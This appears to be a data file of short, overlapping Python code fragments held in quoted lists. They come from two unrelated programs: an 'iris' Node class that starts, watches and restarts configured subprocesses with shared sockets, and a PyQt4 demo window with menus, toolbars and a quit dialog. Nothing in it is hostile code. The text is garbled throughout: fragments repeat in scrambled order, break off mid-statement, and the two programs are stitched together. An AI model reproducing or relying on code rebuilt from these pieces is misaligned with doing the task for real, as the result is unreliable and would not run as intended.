1))) for name, c in six.iteritems(config.get('sockets',", "c.get('port'))) def on_start(self): self.create_shared_sockets() self.running = True shared_fds = json.dumps({port: s.fileno() for port,", "apply_config(self, config): for name, c in six.iteritems(config.get('instances', {})): self._services.append((name, c.get('command'), c.get('numprocesses', 1))) for", "{} self.processes = [] self.running = False self._sockets = [] self._services = []", "= [] self.running = False self._sockets = [] self._services = [] def stats(self):", "service_type, cmd, num in self._services: env = os.environ.copy() env['IRIS_NODE'] = self.container.endpoint env['IRIS_NODE_IP'] =", "def create_shared_sockets(self): for name, host, port in self._sockets: sock = create_socket( '%s:%s' %", "restart(self): print(\"restarting %s\" % self) self.stop() self.start() def stats(self): try: memory = self._process.memory_info()", "stats(self): try: memory = self._process.memory_info() return { 'memory': {'rss': memory.rss, 'vms': memory.vms}, 'cpu':", "self._sockets.append((name, c.get('host'), c.get('port'))) def on_start(self): self.create_shared_sockets() self.running = True shared_fds = json.dumps({port: s.fileno()", "self).__init__(*args, **kwargs) self.sockets = {} self.processes = [] self.running = False self._sockets =", "psutil.NoSuchProcess: if self.running: process.start() continue if status in (psutil.STATUS_ZOMBIE, psutil.STATUS_DEAD): if self.running: process.restart()", "import gevent import os import psutil import six from gevent import subprocess from", "% self) self.stop() self.start() def stats(self): try: memory = self._process.memory_info() return { 'memory':", "= self.container.ip env['IRIS_SHARED_SOCKET_FDS'] = shared_fds for i in range(num): p = Process(cmd.split(' '),", "p.stop() super(Node, self).on_stop() def create_shared_sockets(self): for name, host, port in self._sockets: sock =", "memory.vms}, 'cpu': self._process.cpu_percent(interval=2.0), } except psutil.NoSuchProcess: return {} class Node(Interface): register_with_coordinator = False", "self._process.is_running() def start(self): self._popen = subprocess.Popen( self.cmd, env=self.env, close_fds=False) self._process = psutil.Process(self._popen.pid) def", "def __init__(self, *args, **kwargs): super(Node, self).__init__(*args, **kwargs) self.sockets = {} self.processes = []", "self._process = psutil.Process(self._popen.pid) def stop(self): try: self._process.terminate() self._process.wait() except psutil.NoSuchProcess: pass def restart(self):", "for p in self.processes: if not p.is_running(): continue process_stats.append({ 'command': p.cmd, 'stats': p.stats(),", "return { 'memory': {'rss': memory.rss, 'vms': memory.vms}, 'cpu': self._process.cpu_percent(interval=2.0), } except psutil.NoSuchProcess: return", "def apply_config(self, config): for name, c in six.iteritems(config.get('instances', {})): self._services.append((name, c.get('command'), c.get('numprocesses', 1)))", "for i in range(num): p = Process(cmd.split(' '), env=env) self.processes.append(p) logger.info('starting %s', cmd)", "% (host or self.container.ip, port), inheritable=True) self.sockets[port] = sock def restart_all(self): for process", "def watch_processes(self): while True: for process in self.processes: try: status = process._process.status except", "def is_running(self): return self._process and self._process.is_running() def start(self): self._popen = subprocess.Popen( self.cmd, env=self.env,", "c in six.iteritems(config.get('sockets', {})): self._sockets.append((name, c.get('host'), c.get('port'))) def on_start(self): self.create_shared_sockets() self.running = True", "self._services: env = os.environ.copy() env['IRIS_NODE'] = self.container.endpoint env['IRIS_NODE_IP'] = self.container.ip env['IRIS_SHARED_SOCKET_FDS'] = shared_fds", "self.processes: p.stop() super(Node, self).on_stop() def create_shared_sockets(self): for name, host, port in self._sockets: sock", "i in range(num): p = Process(cmd.split(' '), env=env) self.processes.append(p) logger.info('starting %s', cmd) p.start()", "self._sockets = [] self._services = [] def stats(self): process_stats = [] for p", "def restart(self): print(\"restarting %s\" % self) self.stop() self.start() def stats(self): try: memory =", "return {'processes': process_stats} def apply_config(self, config): for name, c in six.iteritems(config.get('instances', {})): self._services.append((name,", "from iris.core.interfaces import Interface from iris.utils.sockets import create_socket logger = logging.getLogger(__name__) class Process(object):", "return self._process and self._process.is_running() def start(self): self._popen = subprocess.Popen( self.cmd, env=self.env, close_fds=False) self._process", "watch_processes(self): while True: for process in self.processes: try: status = process._process.status except psutil.NoSuchProcess:", "env=env) self.processes.append(p) logger.info('starting %s', cmd) p.start() gevent.spawn(self.watch_processes) def on_stop(self): logger.info(\"waiting for all service", "def on_stop(self): logger.info(\"waiting for all service processes to die ...\") self.running = False", "stats(self): process_stats = [] for p in self.processes: if not p.is_running(): continue process_stats.append({", "processes to die ...\") self.running = False for p in self.processes: p.stop() super(Node,", "process_stats = [] for p in self.processes: if not p.is_running(): continue process_stats.append({ 'command':", "psutil.Process(self._popen.pid) def stop(self): try: self._process.terminate() self._process.wait() except psutil.NoSuchProcess: pass def restart(self): print(\"restarting %s\"", "{'rss': memory.rss, 'vms': memory.vms}, 'cpu': self._process.cpu_percent(interval=2.0), } except psutil.NoSuchProcess: return {} class Node(Interface):", "self) self.stop() self.start() def stats(self): try: memory = self._process.memory_info() return { 'memory': {'rss':", "psutil.NoSuchProcess: pass def restart(self): print(\"restarting %s\" % self) self.stop() self.start() def stats(self): try:", "import six from gevent import subprocess from six.moves import range from iris.core.interfaces import", "}) return {'processes': process_stats} def apply_config(self, config): for name, c in six.iteritems(config.get('instances', {})):", "port, s in six.iteritems(self.sockets)}) for service_type, cmd, num in self._services: env = os.environ.copy()", "is_running(self): return self._process and self._process.is_running() def start(self): self._popen = subprocess.Popen( self.cmd, env=self.env, close_fds=False)", "logger = logging.getLogger(__name__) class Process(object): def __init__(self, cmd, env=None): self.cmd = cmd self.env", "(host or self.container.ip, port), inheritable=True) self.sockets[port] = sock def restart_all(self): for process in", "self.cmd, env=self.env, close_fds=False) self._process = psutil.Process(self._popen.pid) def stop(self): try: self._process.terminate() self._process.wait() except psutil.NoSuchProcess:", "except psutil.NoSuchProcess: if self.running: process.start() continue if status in (psutil.STATUS_ZOMBIE, psutil.STATUS_DEAD): if self.running:", "= create_socket( '%s:%s' % (host or self.container.ip, port), inheritable=True) self.sockets[port] = sock def", "None self._popen = None def is_running(self): return self._process and self._process.is_running() def start(self): self._popen" ]
[ "exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit application') exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready') # menubar menubar = self.menuBar() menubar.setNativeMenuBar(False) fileMenu =", "self.toolbar2 = QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500, 300, 550, 350) # set location", "initUI(self): # text edit textEdit = QtGui.QTextEdit() self.setCentralWidget(textEdit) # menubar's action exitAction =", "edit textEdit = QtGui.QTextEdit() self.setCentralWidget(textEdit) # menubar's action exitAction = QtGui.QAction('&Exit', self) exitAction.setShortcut('Ctrl+Q')", "QtGui.QTextEdit() self.setCentralWidget(textEdit) # menubar's action exitAction = QtGui.QAction('&Exit', self) exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit application') exitAction.triggered.connect(QtGui.QApplication.quit)", "Every PyQt4 application must create an application object #print sys.argv[1:] ex = Example1()", "# set location of app windows on screen and its size self.setWindowTitle('GUI Demo')", "a <b>QWidget</b> widget') # create buttons btn = QtGui.QPushButton('Button', self) # btn.setToolTip('This is", "tool bar QAction with addAction for event handling(setting hot keys,showing status tip) set", "self.toolbar = QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2 = QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500,", "#print sys.argv[1:] ex = Example1() sys.exit(app.exec_()) # The event handling starts from this", "menubar = self.menuBar() menubar.setNativeMenuBar(False) fileMenu = menubar.addMenu('&File') fileMenu.addAction(exitAction) # binding the action to", "a window with menu bar and tool bar QAction with addAction for event", "menu bar and tool bar QAction with addAction for event handling(setting hot keys,showing", "QtGui,QtCore icon_path = join(os.getcwd(),'icon.png') class Example1(QtGui.QMainWindow): def __init__(self): super(Example1, self).__init__() self.initUI() def initUI(self):", "in menubar # toolbar self.toolbar = QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2 = QtGui.QToolBar('name')", "QtGui.QPushButton('Quit', self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint()) qbtn.move(100, 300) # status bar # self.statusBar().showMessage('Ready') # self.statusBar().showMessage('not", "sys.argv[1:] ex = Example1() sys.exit(app.exec_()) # The event handling starts from this point", "window on screen self.center() self.show() def closeEvent(self, event): reply = QtGui.QMessageBox.question(self, 'Message', \"Are", "coding: utf-8 -*- ''' a window with menu bar and tool bar QAction", "you sure to quit?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No) if reply == QtGui.QMessageBox.Yes: event.accept()", "self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500, 300, 550, 350) # set location of app windows on", "sure to quit?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No) if reply == QtGui.QMessageBox.Yes: event.accept() else:", "python # -*- coding: utf-8 -*- ''' a window with menu bar and", "# binding the action to the menu in menubar # toolbar self.toolbar =", "from PyQt4 import QtGui,QtCore icon_path = join(os.getcwd(),'icon.png') class Example1(QtGui.QMainWindow): def __init__(self): super(Example1, self).__init__()", "join(os.getcwd(),'icon.png') class Example1(QtGui.QMainWindow): def __init__(self): super(Example1, self).__init__() self.initUI() def initUI(self): # text edit", "tooltip # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10)) # self.setToolTip('This is a <b>QWidget</b> widget') # create buttons", "= QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500, 300, 550, 350) # set location of", "self.setToolTip('This is a <b>QWidget</b> widget') # create buttons btn = QtGui.QPushButton('Button', self) #", "else: event.ignore() def center(self): qr = self.frameGeometry() cp = QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp) self.move(qr.topLeft()) def", "set location of app windows on screen and its size self.setWindowTitle('GUI Demo') #", "the window on screen self.center() self.show() def closeEvent(self, event): reply = QtGui.QMessageBox.question(self, 'Message',", "PyQt4 application must create an application object #print sys.argv[1:] ex = Example1() sys.exit(app.exec_())", "PyQt4 import QtGui,QtCore icon_path = join(os.getcwd(),'icon.png') class Example1(QtGui.QMainWindow): def __init__(self): super(Example1, self).__init__() self.initUI()", "= QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp) self.move(qr.topLeft()) def main(): app = QtGui.QApplication(sys.argv) # Every PyQt4 application", "''' a window with menu bar and tool bar QAction with addAction for", "''' import os from os.path import join import sys from PyQt4 import QtGui,QtCore", "<reponame>yzwxx/Label_Lab<gh_stars>0 #!/usr/bin/env python # -*- coding: utf-8 -*- ''' a window with menu", "= self.menuBar() menubar.setNativeMenuBar(False) fileMenu = menubar.addMenu('&File') fileMenu.addAction(exitAction) # binding the action to the", "qbtn.move(100, 300) # status bar # self.statusBar().showMessage('Ready') # self.statusBar().showMessage('not Ready') # center the", "= Example1() sys.exit(app.exec_()) # The event handling starts from this point if __name__", "app windows on screen and its size self.setWindowTitle('GUI Demo') # window icon self.setWindowIcon(QtGui.QIcon(icon_path))", "10)) # self.setToolTip('This is a <b>QWidget</b> widget') # create buttons btn = QtGui.QPushButton('Button',", "create buttons btn = QtGui.QPushButton('Button', self) # btn.setToolTip('This is a <b>QPushButton</b> widget') btn.resize(btn.sizeHint())", "application object #print sys.argv[1:] ex = Example1() sys.exit(app.exec_()) # The event handling starts", "import os from os.path import join import sys from PyQt4 import QtGui,QtCore icon_path", "with menu bar and tool bar QAction with addAction for event handling(setting hot", "self.menuBar() menubar.setNativeMenuBar(False) fileMenu = menubar.addMenu('&File') fileMenu.addAction(exitAction) # binding the action to the menu", "Example1() sys.exit(app.exec_()) # The event handling starts from this point if __name__ ==", "Demo') # window icon self.setWindowIcon(QtGui.QIcon(icon_path)) # tooltip # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10)) # self.setToolTip('This is", "keys,showing status tip) set window icon ''' import os from os.path import join", "reply == QtGui.QMessageBox.Yes: event.accept() else: event.ignore() def center(self): qr = self.frameGeometry() cp =", "= QtGui.QAction('&Exit', self) exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit application') exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready') # menubar menubar = self.menuBar()", "event): reply = QtGui.QMessageBox.question(self, 'Message', \"Are you sure to quit?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No,", "for event handling(setting hot keys,showing status tip) set window icon ''' import os", "join import sys from PyQt4 import QtGui,QtCore icon_path = join(os.getcwd(),'icon.png') class Example1(QtGui.QMainWindow): def", "__init__(self): super(Example1, self).__init__() self.initUI() def initUI(self): # text edit textEdit = QtGui.QTextEdit() self.setCentralWidget(textEdit)", "<b>QPushButton</b> widget') btn.resize(btn.sizeHint()) btn.move(0, 300) qbtn = QtGui.QPushButton('Quit', self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint()) qbtn.move(100, 300)", "exitAction = QtGui.QAction('&Exit', self) exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit application') exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready') # menubar menubar =", "super(Example1, self).__init__() self.initUI() def initUI(self): # text edit textEdit = QtGui.QTextEdit() self.setCentralWidget(textEdit) #", "and its size self.setWindowTitle('GUI Demo') # window icon self.setWindowIcon(QtGui.QIcon(icon_path)) # tooltip # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif',", "QtGui.QMessageBox.No) if reply == QtGui.QMessageBox.Yes: event.accept() else: event.ignore() def center(self): qr = self.frameGeometry()", "self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500, 300, 550, 350) # set location of app windows on screen", "event.ignore() def center(self): qr = self.frameGeometry() cp = QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp) self.move(qr.topLeft()) def main():", "event handling(setting hot keys,showing status tip) set window icon ''' import os from", "self.setWindowTitle('GUI Demo') # window icon self.setWindowIcon(QtGui.QIcon(icon_path)) # tooltip # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10)) # self.setToolTip('This", "icon self.setWindowIcon(QtGui.QIcon(icon_path)) # tooltip # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10)) # self.setToolTip('This is a <b>QWidget</b> widget')", "self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2 = QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500, 300, 550, 350) # set", "center the window on screen self.center() self.show() def closeEvent(self, event): reply = QtGui.QMessageBox.question(self,", "= QtGui.QApplication(sys.argv) # Every PyQt4 application must create an application object #print sys.argv[1:]", "status bar # self.statusBar().showMessage('Ready') # self.statusBar().showMessage('not Ready') # center the window on screen", "with addAction for event handling(setting hot keys,showing status tip) set window icon '''", "def __init__(self): super(Example1, self).__init__() self.initUI() def initUI(self): # text edit textEdit = QtGui.QTextEdit()", "Example1(QtGui.QMainWindow): def __init__(self): super(Example1, self).__init__() self.initUI() def initUI(self): # text edit textEdit =", "self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2 = QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500, 300, 550, 350)", "import QtGui,QtCore icon_path = join(os.getcwd(),'icon.png') class Example1(QtGui.QMainWindow): def __init__(self): super(Example1, self).__init__() self.initUI() def", "is a <b>QPushButton</b> widget') btn.resize(btn.sizeHint()) btn.move(0, 300) qbtn = QtGui.QPushButton('Quit', self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint())", "sys.exit(app.exec_()) # The event handling starts from this point if __name__ == '__main__':", "and tool bar QAction with addAction for event handling(setting hot keys,showing status tip)", "= QtGui.QMessageBox.question(self, 'Message', \"Are you sure to quit?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No) if", "= QtGui.QTextEdit() self.setCentralWidget(textEdit) # menubar's action exitAction = QtGui.QAction('&Exit', self) exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit application')", "addAction for event handling(setting hot keys,showing status tip) set window icon ''' import", "handling(setting hot keys,showing status tip) set window icon ''' import os from os.path", "its size self.setWindowTitle('GUI Demo') # window icon self.setWindowIcon(QtGui.QIcon(icon_path)) # tooltip # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10))", "-*- coding: utf-8 -*- ''' a window with menu bar and tool bar", "the action to the menu in menubar # toolbar self.toolbar = QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon)", "550, 350) # set location of app windows on screen and its size", "btn.move(0, 300) qbtn = QtGui.QPushButton('Quit', self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint()) qbtn.move(100, 300) # status bar", "self.center() self.show() def closeEvent(self, event): reply = QtGui.QMessageBox.question(self, 'Message', \"Are you sure to", "# text edit textEdit = QtGui.QTextEdit() self.setCentralWidget(textEdit) # menubar's action exitAction = QtGui.QAction('&Exit',", "# menubar's action exitAction = QtGui.QAction('&Exit', self) exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit application') exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready') #", "self.setWindowIcon(QtGui.QIcon(icon_path)) # tooltip # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10)) # self.setToolTip('This is a <b>QWidget</b> widget') #", "self.statusBar().showMessage('Ready') # self.statusBar().showMessage('not Ready') # center the window on screen self.center() self.show() def", "ex = Example1() sys.exit(app.exec_()) # The event handling starts from this point if", "hot keys,showing status tip) set window icon ''' import os from os.path import", "QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500, 300, 550, 350) # set location of app", "self) # btn.setToolTip('This is a <b>QPushButton</b> widget') btn.resize(btn.sizeHint()) btn.move(0, 300) qbtn = QtGui.QPushButton('Quit',", "QtGui.QMessageBox.question(self, 'Message', \"Are you sure to quit?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No) if reply", "| QtGui.QMessageBox.No, QtGui.QMessageBox.No) if reply == QtGui.QMessageBox.Yes: event.accept() else: event.ignore() def center(self): qr", "QtGui.QPushButton('Button', self) # btn.setToolTip('This is a <b>QPushButton</b> widget') btn.resize(btn.sizeHint()) btn.move(0, 300) qbtn =", "window icon self.setWindowIcon(QtGui.QIcon(icon_path)) # tooltip # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10)) # self.setToolTip('This is a <b>QWidget</b>", "= menubar.addMenu('&File') fileMenu.addAction(exitAction) # binding the action to the menu in menubar #", "self.statusBar().showMessage('Ready') # menubar menubar = self.menuBar() menubar.setNativeMenuBar(False) fileMenu = menubar.addMenu('&File') fileMenu.addAction(exitAction) # binding", "# The event handling starts from this point if __name__ == '__main__': main()", "-*- ''' a window with menu bar and tool bar QAction with addAction", "application must create an application object #print sys.argv[1:] ex = Example1() sys.exit(app.exec_()) #", "300) # status bar # self.statusBar().showMessage('Ready') # self.statusBar().showMessage('not Ready') # center the window", "qr = self.frameGeometry() cp = QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp) self.move(qr.topLeft()) def main(): app = QtGui.QApplication(sys.argv)", "textEdit = QtGui.QTextEdit() self.setCentralWidget(textEdit) # menubar's action exitAction = QtGui.QAction('&Exit', self) exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit", "binding the action to the menu in menubar # toolbar self.toolbar = QtGui.QToolBar('name')", "buttons btn = QtGui.QPushButton('Button', self) # btn.setToolTip('This is a <b>QPushButton</b> widget') btn.resize(btn.sizeHint()) btn.move(0,", "toolbar self.toolbar = QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2 = QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2)", "exitAction.setStatusTip('Exit application') exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready') # menubar menubar = self.menuBar() menubar.setNativeMenuBar(False) fileMenu = menubar.addMenu('&File')", "QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10)) # self.setToolTip('This is a <b>QWidget</b> widget') # create buttons btn =", "self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2 = QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500, 300, 550, 350) #", "self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500, 300, 550, 350) # set location of app windows", "exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready') # menubar menubar = self.menuBar() menubar.setNativeMenuBar(False) fileMenu = menubar.addMenu('&File') fileMenu.addAction(exitAction) #", "QtGui.QAction('&Exit', self) exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit application') exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready') # menubar menubar = self.menuBar() menubar.setNativeMenuBar(False)", "<b>QWidget</b> widget') # create buttons btn = QtGui.QPushButton('Button', self) # btn.setToolTip('This is a", "# btn.setToolTip('This is a <b>QPushButton</b> widget') btn.resize(btn.sizeHint()) btn.move(0, 300) qbtn = QtGui.QPushButton('Quit', self)", "QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No) if reply == QtGui.QMessageBox.Yes: event.accept() else: event.ignore() def center(self):", "center(self): qr = self.frameGeometry() cp = QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp) self.move(qr.topLeft()) def main(): app =", "# window icon self.setWindowIcon(QtGui.QIcon(icon_path)) # tooltip # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10)) # self.setToolTip('This is a", "main(): app = QtGui.QApplication(sys.argv) # Every PyQt4 application must create an application object", "self).__init__() self.initUI() def initUI(self): # text edit textEdit = QtGui.QTextEdit() self.setCentralWidget(textEdit) # menubar's", "== QtGui.QMessageBox.Yes: event.accept() else: event.ignore() def center(self): qr = self.frameGeometry() cp = QtGui.QDesktopWidget().availableGeometry().center()", "of app windows on screen and its size self.setWindowTitle('GUI Demo') # window icon", "self) exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit application') exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready') # menubar menubar = self.menuBar() menubar.setNativeMenuBar(False) fileMenu", "# QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10)) # self.setToolTip('This is a <b>QWidget</b> widget') # create buttons btn", "btn.setToolTip('This is a <b>QPushButton</b> widget') btn.resize(btn.sizeHint()) btn.move(0, 300) qbtn = QtGui.QPushButton('Quit', self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit)", "on screen and its size self.setWindowTitle('GUI Demo') # window icon self.setWindowIcon(QtGui.QIcon(icon_path)) # tooltip", "# Every PyQt4 application must create an application object #print sys.argv[1:] ex =", "create an application object #print sys.argv[1:] ex = Example1() sys.exit(app.exec_()) # The event", "window with menu bar and tool bar QAction with addAction for event handling(setting", "def center(self): qr = self.frameGeometry() cp = QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp) self.move(qr.topLeft()) def main(): app", "def closeEvent(self, event): reply = QtGui.QMessageBox.question(self, 'Message', \"Are you sure to quit?\", QtGui.QMessageBox.Yes", "menubar's action exitAction = QtGui.QAction('&Exit', self) exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit application') exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready') # menubar", "btn.resize(btn.sizeHint()) btn.move(0, 300) qbtn = QtGui.QPushButton('Quit', self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint()) qbtn.move(100, 300) # status", "= QtGui.QPushButton('Quit', self) qbtn.clicked.connect(QtCore.QCoreApplication.instance().quit) qbtn.resize(qbtn.sizeHint()) qbtn.move(100, 300) # status bar # self.statusBar().showMessage('Ready') #", "location of app windows on screen and its size self.setWindowTitle('GUI Demo') # window", "closeEvent(self, event): reply = QtGui.QMessageBox.question(self, 'Message', \"Are you sure to quit?\", QtGui.QMessageBox.Yes |", "QAction with addAction for event handling(setting hot keys,showing status tip) set window icon", "tip) set window icon ''' import os from os.path import join import sys", "self.setCentralWidget(textEdit) # menubar's action exitAction = QtGui.QAction('&Exit', self) exitAction.setShortcut('Ctrl+Q') exitAction.setStatusTip('Exit application') exitAction.triggered.connect(QtGui.QApplication.quit) self.statusBar().showMessage('Ready')", "is a <b>QWidget</b> widget') # create buttons btn = QtGui.QPushButton('Button', self) # btn.setToolTip('This", "on screen self.center() self.show() def closeEvent(self, event): reply = QtGui.QMessageBox.question(self, 'Message', \"Are you", "self.frameGeometry() cp = QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp) self.move(qr.topLeft()) def main(): app = QtGui.QApplication(sys.argv) # Every", "self.move(qr.topLeft()) def main(): app = QtGui.QApplication(sys.argv) # Every PyQt4 application must create an", "QtGui.QToolBar('name') self.toolbar.setToolButtonStyle(QtCore.Qt.ToolButtonTextUnderIcon) self.toolbar.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar) self.toolbar2 = QtGui.QToolBar('name') self.toolbar2.setToolButtonStyle(QtCore.Qt.ToolButtonTextBesideIcon) self.toolbar2.addAction(exitAction) self.addToolBar(QtCore.Qt.TopToolBarArea,self.toolbar2) self.setGeometry(500, 300, 550,", "self.initUI() def initUI(self): # text edit textEdit = QtGui.QTextEdit() self.setCentralWidget(textEdit) # menubar's action", "= QtGui.QPushButton('Button', self) # btn.setToolTip('This is a <b>QPushButton</b> widget') btn.resize(btn.sizeHint()) btn.move(0, 300) qbtn", "qbtn.resize(qbtn.sizeHint()) qbtn.move(100, 300) # status bar # self.statusBar().showMessage('Ready') # self.statusBar().showMessage('not Ready') # center", "menubar menubar = self.menuBar() menubar.setNativeMenuBar(False) fileMenu = menubar.addMenu('&File') fileMenu.addAction(exitAction) # binding the action", "must create an application object #print sys.argv[1:] ex = Example1() sys.exit(app.exec_()) # The", "# self.setToolTip('This is a <b>QWidget</b> widget') # create buttons btn = QtGui.QPushButton('Button', self)", "window icon ''' import os from os.path import join import sys from PyQt4", "object #print sys.argv[1:] ex = Example1() sys.exit(app.exec_()) # The event handling starts from", "QtGui.QMessageBox.Yes: event.accept() else: event.ignore() def center(self): qr = self.frameGeometry() cp = QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp)", "350) # set location of app windows on screen and its size self.setWindowTitle('GUI", "icon ''' import os from os.path import join import sys from PyQt4 import", "= join(os.getcwd(),'icon.png') class Example1(QtGui.QMainWindow): def __init__(self): super(Example1, self).__init__() self.initUI() def initUI(self): # text", "self.setGeometry(500, 300, 550, 350) # set location of app windows on screen and", "\"Are you sure to quit?\", QtGui.QMessageBox.Yes | QtGui.QMessageBox.No, QtGui.QMessageBox.No) if reply == QtGui.QMessageBox.Yes:", "status tip) set window icon ''' import os from os.path import join import", "= self.frameGeometry() cp = QtGui.QDesktopWidget().availableGeometry().center() qr.moveCenter(cp) self.move(qr.topLeft()) def main(): app = QtGui.QApplication(sys.argv) #", "# tooltip # QtGui.QToolTip.setFont(QtGui.QFont('SansSerif', 10)) # self.setToolTip('This is a <b>QWidget</b> widget') # create", "# create buttons btn = QtGui.QPushButton('Button', self) # btn.setToolTip('This is a <b>QPushButton</b> widget')", "bar and tool bar QAction with addAction for event handling(setting hot keys,showing status", "# self.statusBar().showMessage('Ready') # self.statusBar().showMessage('not Ready') # center the window on screen self.center() self.show()", "# center the window on screen self.center() self.show() def closeEvent(self, event): reply =", "# status bar # self.statusBar().showMessage('Ready') # self.statusBar().showMessage('not Ready') # center the window on", "os.path import join import sys from PyQt4 import QtGui,QtCore icon_path = join(os.getcwd(),'icon.png') class", "screen and its size self.setWindowTitle('GUI Demo') # window icon self.setWindowIcon(QtGui.QIcon(icon_path)) # tooltip #", "size self.setWindowTitle('GUI Demo') # window icon 